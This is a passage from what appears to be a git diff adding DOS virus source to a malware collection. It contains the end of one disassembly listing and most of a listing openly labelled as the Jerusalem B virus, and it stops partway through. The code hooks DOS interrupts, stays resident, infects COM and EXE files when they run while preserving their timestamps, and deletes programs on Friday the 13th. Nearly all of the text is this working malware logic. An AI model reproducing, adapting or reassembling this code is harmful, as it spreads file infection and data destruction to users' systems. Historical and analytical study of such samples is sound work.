2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru.asm b/MSDOS/Virus.MSDOS.Unknown.jeru.asm new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru.asm @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H 